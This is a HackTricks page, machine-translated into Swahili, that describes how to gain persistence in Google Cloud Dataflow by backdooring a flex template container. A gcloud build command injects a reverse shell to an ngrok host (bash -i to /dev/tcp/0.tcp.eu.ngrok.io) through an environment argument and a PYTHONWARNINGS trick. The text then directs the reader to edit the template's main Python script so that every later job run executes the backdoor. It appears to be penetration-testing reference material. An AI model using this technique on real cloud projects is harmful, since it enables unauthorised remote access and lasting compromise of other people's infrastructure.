GCP - Dataflow Persistence

Support HackTricks

Dataflow

Uhifadhi usioonekana kwenye kontena iliyojengwa

Kufuatia mafunzo kutoka kwenye nyaraka unaweza kuunda templeti mpya (k.m. python) ya flex:

git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
cd python-docs-samples/dataflow/flex-templates/getting_started

# Create repository where dockerfiles and code is going to be stored
export REPOSITORY=flex-example-python
gcloud storage buckets create gs://$REPOSITORY

# Create artifact storage
export NAME_ARTIFACT=flex-example-python
gcloud artifacts repositories create $NAME_ARTIFACT \
--repository-format=docker \
--location=us-central1
gcloud auth configure-docker us-central1-docker.pkg.dev

# Create template
export NAME_TEMPLATE=flex-template
gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
--image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \
--sdk-language "PYTHON" \
--flex-template-base-image "PYTHON3" \
--metadata-file "metadata.json" \
--py-path "." \
--env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \
--env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \
--env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \
--env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \
--region=us-central1

Wakati inajengwa, utapata kifaa cha kuingilia kwa nyuma (unaweza kutumia mazingira kama katika mfano uliopita au vigezo vingine vinavyoweka faili ya Docker kutekeleza mambo ya kupindukia). Wakati huu, ndani ya kifaa cha kuingilia kwa nyuma, ni rahisi kwenda kwenye saraka ya /template na kuhariri nambari ya skripti kuu ya python itakayotekelezwa (katika mfano wetu hii ni getting_started.py). Weka mlango wako wa nyuma hapa ili kila wakati kazi itakapotekelezwa, itatekeleza hilo.

Kisha, wakati kazi itakapotekelezwa tena, kontena iliyoharibiwa itakayojengwa itatekelezwa:

# Run template
gcloud dataflow $NAME_TEMPLATE run testing \
--template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \
--parameters=output="gs://$REPOSITORY/out" \
--region=us-central1
Support HackTricks

Last updated